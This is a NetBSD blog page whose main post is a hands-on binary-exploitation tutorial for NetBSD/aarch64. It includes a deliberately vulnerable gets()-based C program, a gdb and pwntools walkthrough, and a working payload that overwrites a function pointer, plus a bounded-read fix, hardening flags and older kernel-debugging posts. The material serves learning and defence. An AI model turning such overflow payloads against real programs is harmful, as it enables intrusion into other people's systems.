hubertf's NetBSD Blog
Send interesting links to hubert at feyrer dot de!
 
[20260308] pwning NetBSD-aarch64 (ARM)

For some time, I have ventured into low(er)level hacking & cybersecurity at OverTheWire and pwn.college. Today, a LOT of security & hacking is focussed on Linux/x86, but we all know there is more. More operating systems, and more CPUs. In the area of binary exploitation, I wondered if the basic tools for that work on NetBSD/aarch64 (ARM), and I had a look. Spoiler: they do!

Here's an example of pwning on NetBSD/aarch64 (ARM).

Preparation

Step 0: Install NetBSD/aarch64, e.g. in qemu.

Set up the basics:

su root -c "pkg_add -v https://cdn.netbsd.org/pub/pkgsrc/packages/NetBSD/aarch64/11.0_2025Q4/All/pkgin-25.10.0.tgz"
su root -c "pkgin install sudo"
sudo pkgin install bash

Install pwntools & friends:

sudo pkgin install python311 # not newer... pwntools...
sudo pkgin install rust
sudo pkgin install cmake pkg-config openssl
sudo pkgin install gmake
sudo pkgin install vim # for xxd, not the shoddy editor that comes with it

When going for pwntools & friends, python 3.11 is the version of choice - newer versions of python are not supported there:

python3.11 -m venv venv-pwn
. ./venv-pwn/bin/activate
pip install "capstone<6" pwntools # same as on macos with angr

Install gef in its usual place, just in case:

sudo mkdir -p /opt/gef
sudo wget https://github.com/hugsy/gef/raw/main/gef.py -O /opt/gef/gef.py

gdb - better colors etc. via .gdbinit (default gdb really looks bad on black terminals):

(venv-pwn) qnetbsd$ cat ~/.gdbinit
#set disassembly-flavor intel # disable on ARM :-)
set follow-fork-mode child

set style address foreground cyan
set style function foreground cyan
set style disassembler immediate foreground cyan

pwn v1

First pwn attempt:

#include <stdio.h>
#include <stdlib.h>

void win(void)
{
	printf("Goodbye, winner.\n");
	exit(0);
}

void vuln(void)
{
	char name[16];

	printf("What is your name? ");
	gets(name);
	printf("Hello %s\n", name);

	return;
}

int main(void)
{
	vuln();
	return 0;
}

Due to differences between x86 and ARM, a simple buffer overflow to overwrite e.g. the return address cannot be done. On ARM, the return address of a function is not stored on the stack but in the X30 register. The crash observed when running this is due to random other values being overwritten.

Let's build and see the security parameters:

(venv-pwn) qemubsd$ gcc -ggdb win1.c -o win1
ld: /tmp//ccdWZtt2.o: in function `vuln':
/home/feyrer/tmp/win1.c:15:(.text+0x34): warning: warning: this program uses gets(), which is unsafe.
(venv-pwn) qemubsd$ pwn checksec  win1
[!] Could not populate PLT: Failed to load the Unicorn dynamic library
[*] '/home/feyrer/tmp/win1'
    Arch:       aarch64-64-little
    RELRO:      No RELRO
    Stack:      No canary found
    NX:         NX disabled
    PIE:        No PIE (0x200100000)
    RWX:        Has RWX segments
    Stripped:   No
    Debuginfo:  Yes

Not that many security features on by default. What's going on, NetBSD?!
Ignoring this for now, let's look at the assembly code:

(venv-pwn) qnetbsd$ gdb -q -ex 'disas vuln' win1
Reading symbols from win1...
Dump of assembler code for function vuln:
   0x00000002001009f4 <+0>:	stp	x29, x30, [sp, #-32]!
   0x00000002001009f8 <+4>:	mov	x29, sp
   0x00000002001009fc <+8>:	adrp	x0, 0x200100000
   0x0000000200100a00 <+12>:	add	x0, x0, #0xaf8
   0x0000000200100a04 <+16>:	bl	0x200100730 <printf@plt>
   0x0000000200100a08 <+20>:	add	x0, sp, #0x10
   0x0000000200100a0c <+24>:	bl	0x200100790 <gets@plt>
   0x0000000200100a10 <+28>:	add	x0, sp, #0x10
   0x0000000200100a14 <+32>:	mov	x1, x0
   0x0000000200100a18 <+36>:	adrp	x0, 0x200100000
   0x0000000200100a1c <+40>:	add	x0, x0, #0xb10
   0x0000000200100a20 <+44>:	bl	0x200100730 <printf@plt>
   0x0000000200100a24 <+48>:	nop
   0x0000000200100a28 <+52>:	ldp	x29, x30, [sp], #32
   0x0000000200100a2c <+56>:	ret
End of assembler dump.
(gdb)

Note the STP and LDP instructions which save and restore the X29 (frame pointer) and X30 (return address) registers of the calling function (main). By overwriting them, main's "RET" will do funny things. While this can still be exploited, let's make things a bit easier in the next attempt.

pwn v2

Here we add a function pointer "goodbye" that can be overwritten:

#include <stdio.h>
#include <stdlib.h>

void lose(void)
{
	printf("Goodbye, loser.\n");
	exit(0);
}

void win(void)
{
	printf("Goodbye, winner.\n");
	exit(0);
}

void vuln(void)
{
	void (*goodbye)(void) = lose;
	char name[16];

	printf("What is your name? ");
	gets(name);
	printf("Hello %s\n", name);

	goodbye();

	return;
}

int main(void)
{
	vuln();
	return 0;
}

It's pretty obvious what's happening, but for the sake of completeness:

(venv-pwn) qnetbsd$ echo huhu | ./win2
What is your name? Hello huhu
Goodbye, loser.

Let's look at the assembly output again:

(venv-pwn) qnetbsd$ gdb -q -ex 'disas vuln' win2
Reading symbols from win2...
Dump of assembler code for function vuln:
   0x0000000200100a10 <+0>:	stp	x29, x30, [sp, #-48]!
   0x0000000200100a14 <+4>:	mov	x29, sp
   0x0000000200100a18 <+8>:	adrp	x0, 0x200100000
   0x0000000200100a1c <+12>:	add	x0, x0, #0x9d8
   0x0000000200100a20 <+16>:	str	x0, [sp, #40]
   0x0000000200100a24 <+20>:	adrp	x0, 0x200100000
   0x0000000200100a28 <+24>:	add	x0, x0, #0xb38
   0x0000000200100a2c <+28>:	bl	0x200100730 <printf@plt>
   0x0000000200100a30 <+32>:	add	x0, sp, #0x18
   0x0000000200100a34 <+36>:	bl	0x200100790 <gets@plt>
   0x0000000200100a38 <+40>:	add	x0, sp, #0x18
   0x0000000200100a3c <+44>:	mov	x1, x0
   0x0000000200100a40 <+48>:	adrp	x0, 0x200100000
   0x0000000200100a44 <+52>:	add	x0, x0, #0xb50
   0x0000000200100a48 <+56>:	bl	0x200100730 <printf@plt>
=> 0x0000000200100a4c <+60>:	ldr	x0, [sp, #40]               <===
=> 0x0000000200100a50 <+64>:	blr	x0                          <===
   0x0000000200100a54 <+68>:	nop
   0x0000000200100a58 <+72>:	ldp	x29, x30, [sp], #48
   0x0000000200100a5c <+76>:	ret
End of assembler dump.
(gdb)

Note the LDR and BLR instructions at 0x0000000200100a4c: the X0 register is loaded with our function pointer by LDR, and BLR does the actual call.

By overwriting the pointer, we can call another function. Let's use pwn cyclic to find out what's actually in x0 at the time of the BLR call:

(venv-pwn) qnetbsd$ pwn cyclic 100 >c
(venv-pwn) qnetbsd$ gdb  -q -ex 'set pagination off' -ex 'b *0x0000000200100a50' -ex 'run <c' -ex 'i r x0' win
Reading symbols from win...
Breakpoint 1 at 0x200100a50: file win.c, line 25.
Starting program: /home/feyrer/tmp/win <c
What is your name? Hello aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa

Breakpoint 1, 0x0000000200100a50 in vuln () at win.c:25
25		goodbye();
x0             0x6161616661616165  7016996786768273765
(gdb) ! pwn cyclic -l 0x6161616661616165
16
(gdb) print win
$1 = {void (void)} 0x2001009f4 <win>

The function pointer is 16 bytes from the start of our name buffer, and we have the address of the win function. So let's construct our input:

(venv-pwn) qnetbsd$ python3 -c 'from pwn import * ; p = b"A" * 16 + p64(0x2001009f4); sys.stdout.buffer.write(p)' | xxd
00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000010: f409 1000 0200 0000                      ........

Looks good, so call it:

(venv-pwn) qnetbsd$ python3 -c 'from pwn import * ; p = b"A" * 16 + p64(0x2001009f4); sys.stdout.buffer.write(p)' | ./win2
What is your name? Hello AAAAAAAAAAAAAAAA
Goodbye, winner.
(venv-pwn) qnetbsd$ uname -a
NetBSD qnetbsd 11.0_RC2 NetBSD 11.0_RC2 (GENERIC64) #0: Wed Mar  4 21:02:00 UTC 2026  mkrepro@mkrepro.NetBSD.org:/usr/src/sys/arch/evbarm/compile/GENERIC64 evbarm

Success

Voila, ARM pwnage on NetBSD! :-)

Summary:
(venv-pwn) qnetbsd$ echo huhu | ./win2
What is your name? Hello huhu
Goodbye, loser.
(venv-pwn) qnetbsd$ python3 -c 'from pwn import * ; p = b"A" * 16 + p64(0x2001009f4); sys.stdout.buffer.write(p)' | ./win2
What is your name? Hello AAAAAAAAAAAAAAAA�
Goodbye, winner.
(venv-pwn) qnetbsd$ uname -a
NetBSD qnetbsd 11.0_RC2 NetBSD 11.0_RC2 (GENERIC64) #0: Wed Mar  4 21:02:00 UTC 2026  mkrepro@mkrepro.NetBSD.org:/usr/src/sys/arch/evbarm/compile/GENERIC64 evbarm 

I'm positively impressed by the whole toolchain working as expected, given that e.g. pwntools starts compiling rust when installing. Well done, NetBSD!
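
gets() cannot know that name holds only 16 bytes, which is what let the input reach the goodbye pointer. A source-level fix for win2.c, added here as an example and not part of the original post: read_name and vuln_with are names made up for it, and win/lose return their message instead of calling exit() so the result can be checked.

```c
#include <stdio.h>
#include <string.h>

/* Return strings instead of calling exit() so the outcome can be checked. */
const char *lose(void) { return "Goodbye, loser."; }
const char *win(void)  { return "Goodbye, winner."; }

/* Read one line into buf (capacity size); the result is always NUL-terminated.
 * Bytes beyond size-1 are consumed and dropped, so an over-long line can
 * neither write past buf nor spill into the next read.
 * Returns the number of bytes stored, or -1 on EOF before any byte. */
long read_name(FILE *in, char *buf, size_t size)
{
    size_t len = 0;
    int c, any = 0;

    if (size == 0)
        return -1;
    while ((c = getc(in)) != EOF && c != '\n') {
        any = 1;
        if (len + 1 < size)
            buf[len++] = (char)c;   /* store only what fits */
    }
    buf[len] = '\0';
    return (c == EOF && !any) ? -1 : (long)len;
}

/* vuln() from win2.c with gets() replaced by the bounded reader. */
const char *vuln(FILE *in, FILE *out)
{
    const char *(*goodbye)(void) = lose;
    char name[16];

    fprintf(out, "What is your name? ");
    read_name(in, name, sizeof name);   /* EOF leaves an empty name */
    fprintf(out, "Hello %s\n", name);
    return goodbye();
}

/* Feed vuln() a byte string through a temporary file (helper for the demo). */
const char *vuln_with(const void *data, size_t n)
{
    FILE *in = tmpfile();
    const char *result;

    if (in == NULL)
        return NULL;
    fwrite(data, 1, n, in);
    rewind(in);
    result = vuln(in, stderr);
    fclose(in);
    return result;
}

int main(void)
{
    /* Constructed sample: 24 filler bytes, longer than the 16-byte buffer. */
    const char *r = vuln_with("AAAAAAAAAAAAAAAABBBBBBBB\n", 25);

    puts(r ? r : "tmpfile failed");
    return 0;
}
```

The name is cut to 15 bytes plus the terminator, and the rest of the line is discarded rather than left for the next read.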

On security & compiler flags

Of course you can enable all the security flags shown above, with the proper gcc flags:

(venv-pwn) qemubsd$ gcc -ggdb -fstack-protector-all -fpie -pie -Wl,-z,relro,-z,now win1.c -o win1-prot
ld: /tmp//ccE3ncle.o: in function `vuln':
/home/feyrer/tmp/win1.c:15:(.text+0x64): warning: warning: this program uses gets(), which is unsafe.
(venv-pwn) qemubsd$ pwn checksec win1-prot
[!] Could not populate PLT: Failed to load the Unicorn dynamic library
[*] '/home/feyrer/tmp/win1-prot'
    Arch:       aarch64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX disabled
    PIE:        PIE enabled
    RWX:        Has RWX segments
    Stripped:   No
    Debuginfo:  Yes

Exploiting this binary is left as an exercise to the reader.
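
The PIE, RELRO, NX and RWX lines in a checksec report come from the ELF header and program headers. As an added example (not part of the original post and not pwntools' code), this reader applies the usual markers, ET_DYN, PT_GNU_RELRO, PT_GNU_STACK and a PT_LOAD segment with R+W+X, to a constructed header image rather than to the binaries above. It assumes a little-endian host and does not tell partial from full RELRO; elf_report, build_sample and Report are names made up for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Minimal ELF64 layouts, declared locally so the example builds anywhere. */
typedef struct {
    unsigned char ident[16];
    uint16_t type, machine; uint32_t version;
    uint64_t entry, phoff, shoff; uint32_t flags;
    uint16_t ehsize, phentsize, phnum, shentsize, shnum, shstrndx;
} Ehdr;
typedef struct { uint32_t type, flags; uint64_t offset, vaddr, paddr, filesz, memsz, align; } Phdr;
enum { TYPE_DYN = 3, SEG_LOAD = 1, SEG_GNU_STACK = 0x6474e551,
       SEG_GNU_RELRO = 0x6474e552, FLAG_X = 1, FLAG_RWX = 7 };
/* stack_exec: -1 = no PT_GNU_STACK header, 0 = marked non-executable, 1 = executable */
typedef struct { int pie, relro, rwx_load, stack_exec; } Report;

/* Fill *r from an in-memory image; -1 if it is not a well-formed ELF64 LSB file. */
int elf_report(const unsigned char *img, size_t len, Report *r)
{
    Ehdr eh; Phdr ph;
    memset(r, 0, sizeof *r);
    r->stack_exec = -1;
    if (len < sizeof eh) return -1;
    memcpy(&eh, img, sizeof eh);
    if (memcmp(eh.ident, "\177ELF\2\1", 6) != 0) return -1;  /* magic, 64-bit, LSB */
    if (eh.phentsize != sizeof ph || eh.phoff > len ||
        (uint64_t)eh.phnum * sizeof ph > len - eh.phoff)
        return -1;                      /* header table must lie inside the image */
    r->pie = (eh.type == TYPE_DYN);
    for (size_t i = 0; i < eh.phnum; i++) {
        memcpy(&ph, img + eh.phoff + i * sizeof ph, sizeof ph);
        if (ph.type == SEG_GNU_RELRO) r->relro = 1;
        if (ph.type == SEG_GNU_STACK) r->stack_exec = (ph.flags & FLAG_X) != 0;
        if (ph.type == SEG_LOAD && (ph.flags & FLAG_RWX) == FLAG_RWX) r->rwx_load = 1;
    }
    return 0;
}

/* Constructed sample: ELF header plus program headers only, no code or data. */
size_t build_sample(unsigned char *buf, int hardened)
{
    Ehdr eh = {{0}};
    Phdr ph[3] = {{0}};
    memcpy(eh.ident, "\177ELF\2\1\1", 7);
    eh.type = hardened ? TYPE_DYN : 2;              /* 2 = ET_EXEC */
    eh.phoff = sizeof eh; eh.phentsize = sizeof ph[0]; eh.phnum = hardened ? 3 : 1;
    ph[0].type = SEG_LOAD;      ph[0].flags = hardened ? 5 : 7;   /* R+X vs R+W+X */
    ph[1].type = SEG_GNU_STACK; ph[1].flags = 6;                  /* R+W, no X */
    ph[2].type = SEG_GNU_RELRO; ph[2].flags = 4;
    memcpy(buf, &eh, sizeof eh);
    memcpy(buf + sizeof eh, ph, eh.phnum * sizeof ph[0]);
    return sizeof eh + eh.phnum * sizeof ph[0];
}

int main(void)
{
    unsigned char img[sizeof(Ehdr) + 3 * sizeof(Phdr)]; Report r;
    for (int h = 0; h <= 1; h++)
        if (elf_report(img, build_sample(img, h), &r) == 0)
            printf("pie=%d relro=%d rwx_load=%d stack_exec=%d\n",
                   r.pie, r.relro, r.rwx_load, r.stack_exec);
    return 0;
}
```

A stack_exec of -1 only means the binary carries no PT_GNU_STACK marker; whether the stack is executable at run time is decided by the operating system.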



[20080915] Debugging NetBSD kernel with qemu
Alexander Shishkin has posted instructions on how to debug a NetBSD kernel running in qemu with gdb. He reminds readers how to build NetBSD, provides a shell script for making a bootable disk, and explains the magic of how to run qemu and connect gdb to it. An example session shows how to load the kernel, set a breakpoint, and examine registers and variables when the breakpoint is reached.



[20061115] Post mortem debugging, or: what happened before it crashed? (Updated)
So your machine panicked, and as you were running X you have no clue what went on? Here's a nice way to find out, assuming you have a kernel crash dump. To ensure the latter, set kern.dump_on_panic=1 in /etc/sysctl.conf. Now, what to do with those crashdumps?
% ls -l /var/crash/
total 3183838
-rw-r--r--  1 root  wheel          3 Nov  2 02:09 bounds
-rw-r--r--  1 root  wheel          5 Jun 30  2004 minfree
...
-rw-------  1 root  wheel  181265401 Nov  2 02:11 netbsd.26.core.gz
-rw-------  1 root  wheel    2162696 Nov  2 02:11 netbsd.26.gz 
In /var/crash, "bounds" contains an increasing counter for the crashdump number (it would be "27" in the above example), and "minfree" contains the minimum amount of free space in kilobytes that should be kept free - both files are read by savecore(8) when /etc/rc.conf has "savecore=yes", which is the default.

The actual crashdump consists of two gzipped files - the actual memory dump "netbsd.XX.core.gz" and a copy of the running kernel "netbsd.XX.gz". After uncompressing, the files can be used for looking at the system at the point of its panic:

# gunzip netbsd.26*.gz
#
Note that the crashdump may contain sensitive data and is as such only readable by root!

The crashdump can be read by programs that use libkvm to read through the crashdump's kernel memory, e.g. gdb(1), dmesg(8), ps(1), fstat(8), ipcs(1), netstat(8), nfsstat(8), pmap(1), w(1), pstat(8), vmstat(8) etc., using the -M and -N switches.

Some examples:

  • To show the system's message buffer at the time of the crash:
    % dmesg -M netbsd.26.core -N netbsd.26
    ...
    unmounting /home (/dev/wd1e)...
    unmounting /tmp (mfs:371)...warning: mfs read during shutdown
    dev = 0xff00, block = 10496, fs = /tmp
    panic: blkfree: freeing free block
    Begin traceback...
    uvm_fault(0xcbfd07f0, 0x2000, 1) -> 0xe
    fatal page fault in supervisor mode
    trap type 6 code 0 eip c0305083 cs 8 eflags 10246 cr2 2900 ilevel 0
    panic: trap
    Faulted in mid-traceback; aborting...
    dumping to dev 0,1 offset 2024327
    dump 511 510 509 508 507 506 505 504 503 502 501 500 499 498 497 496
    495 494 493 ...
    Apparently the system tried to free a block that was already freed here when unmounting /tmp.

  • Display virtual memory parameters:
    % vmstat -M netbsd.26.core -N netbsd.26 -s
         4096 bytes per page
            8 page colors
       127888 pages managed
              ...  

  • Attach the GNU debugger gdb(1) to the system crash dump, to poke around deeply:
    % gdb netbsd.26
    ...
    (gdb) target kcore netbsd.26.core
    panic: blkfree: freeing free block
    #0  0x0ac04000 in ?? ()
    (gdb) bt
    #0  0x0ac04000 in ?? ()
    #1  0xc03084b5 in cpu_reboot ()
    #2  0xc02a57aa in panic ()
    #3  0xc0313127 in trap ()
    #4  0xc0102dfd in calltrap ()
    #5  0xc0182544 in db_get_value ()
    #6  0xc03058f1 in db_stack_trace_print ()
    #7  0xc02a577c in panic ()
    #8  0xc0205db7 in ffs_blkfree ()
    #9  0xc020b8d5 in ffs_indirtrunc ()
    ...  
  • Unfortunately there are a number of programs that I didn't get to work with my crashdump, but that may be due to its point after/during system shutdown, e.g. ps(1) didn't work.
Still that should give some start for poking around...

Update: Apparently 'target kcore' was renamed to 'target kvm' in gdb6, see this posting.



[20060729] Enabling separate debug symbol support for gdb6
NetBSD-current got an update to the latest GNU debugger, gdb6, recently. That version allows keeping the debug information for a binary in a separate file, thus not bloating every client's filesystem while still being able to keep debugging symbols around in some place.

Luke Mewburn has sent a proposal to enable this in NetBSD, and he has committed code now that allows setting "MKDEBUG=yes" to put separate debugging symbols into /usr/libdata/debug.

This is currently not enabled by default, but maybe someone finds this useful, wants to test it and give some feedback.




Disclaimer: All opinion expressed here is purely my own. No responsibility is taken for anything.

Copyright (c) Hubert Feyrer